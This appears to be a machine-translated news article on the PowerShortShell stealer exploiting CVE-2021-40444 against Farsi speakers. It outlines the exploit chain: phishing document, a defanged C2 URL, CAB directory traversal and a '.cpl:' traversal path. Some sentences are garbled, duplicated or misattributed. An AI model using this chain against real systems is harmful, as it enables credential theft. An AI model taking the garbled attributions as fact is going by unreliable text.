Hackers take advantage of Microsoft’s MSHTML bug to steal Google and Instagram credentials

news

A new PowerShell-based stealer called PowerShortShell has been used by security researchers at SafeBreach Labs to steal Google and Instagram credentials owned by Farsi-speaking targets around the world. We found out about it.

https://www.safebreach.com/blog/2021/new-powershortshell-stealer- exploits-recent-microsoft-mshtml-vulnerability-to-spy-on-farsi-speakers/

It appears that this information-stealing tool is also being used to monitor Telegram, collecting system information from compromised devices and sending it along with stolen credentials to a server controlled by the attackers.

This attack (publicly reported by Shadow Chaser Group on Twitter in September) started as a spear phishing email in July.

These attacks target Windows users with malicious Winword attachments that exploit a remote code execution (RCE) bug in Microsoft MSHTML, tracked as CVE-2021-40444.

https://www. bleepingcomputer.com/tag/cve-2021-40444/

The PowerShortShell stealer payload is executed by a DLL that is downloaded to the infected system. Once launched, the PowerShell script starts collecting data and screen snapshots and sends the data to the attacker’s command and control server.

It appears that almost half of the victims reside in the United States, and based on the content of the Microsoft Word document (which blames the Iranian leadership) and the nature of the data collected, it is speculated that the victims are Iranians living abroad and may be considered a threat to the Iranian The content of the Microsoft Word document (which blames the Iranian leadership) and the nature of the data collected suggest that the victims are Iranians living abroad who may be viewed as a threat to the Islamic regime in Iran. It is possible that the adversary is tied to the Iranian Islamic regime.

The CVE-2021-40444 RCE bug affecting IE’s MSTHML rendering engine has been exploited in the real world as a zero-day vulnerability for more than two weeks before Microsoft issued a security advisory with a partial workaround.

Most recently, it was used in conjunction with malicious advertisements by the Magniber ransomware to infect targets with malware and encrypt their devices.

In addition, according to Microsoft, several threat groups, including ransomware affiliates, used maliciously crafted Office documents delivered in phishing attacks to target this Windows MSHTML RCE bug.

These attacks used the CVE-2021-40444 flaw “as part of an early access campaign to distribute a custom Cobalt Strike Beacon loader.

The distributed beacons communicated with malicious infrastructure associated with several cybercrime campaigns, including human-operated ransomware.

CVE-2021-40444 attack chain

It is not surprising that more and more attackers are taking advantage of the CVE-2021-40444 vulnerability. This is because even before the bug was patched, threat actors were sharing tutorials and proof-of-concept exploits on hacking forums.

This leads us to believe that other threat actors or groups have launched attacks that take advantage of this security flaw.

The information shared on the Internet is simple and anyone can easily create a working version of the CVE-2021-40444 exploit. This includes a Python server that can distribute malicious documents and CAB files to infected systems.

Using this information, we were able to successfully reproduce the exploit in about 15 minutes, as shown in this video demo.

Outline of the attack

Describes the steps of the CVE-2021-40444 exploit

Step 1

The attack starts by sending a spear phishing email (WinWord attachment) that the victim is lured into opening.

Step 2

The Word file connects to the malicious server, runs the malicious html, and drops the DLL into the %temp% directory.

The relationships stored in the xml file document.xml.rels can be used by malicious html: mshtml:http://hr[.] on the C2 server. dedyn[.] It points to io/image.html.

The JScript in the HTML contains an object pointing to the CAB file and an iframe pointing to the INF file, which is preceded by a “.cpl:” directive.

The CAB file will be opened, because CAB has a directory traversal vulnerability that allows you to save the msword.inf file in %TEMP%.

Step 3

A malicious DLL will execute the PowerShell script.

INF files are opened with the “.cpl:” directive and sideloaded via rundll32. Example: “.cpl:. /. /… /… /Temp/Low/msword.inf”.

Msword.inf will be downloaded by dll and will execute the final payload (PowerShell script).

The PowerShell script collects data and exfiltrates it to the attacker’s C2 server.

Comments

タイトルとURLをコピーしました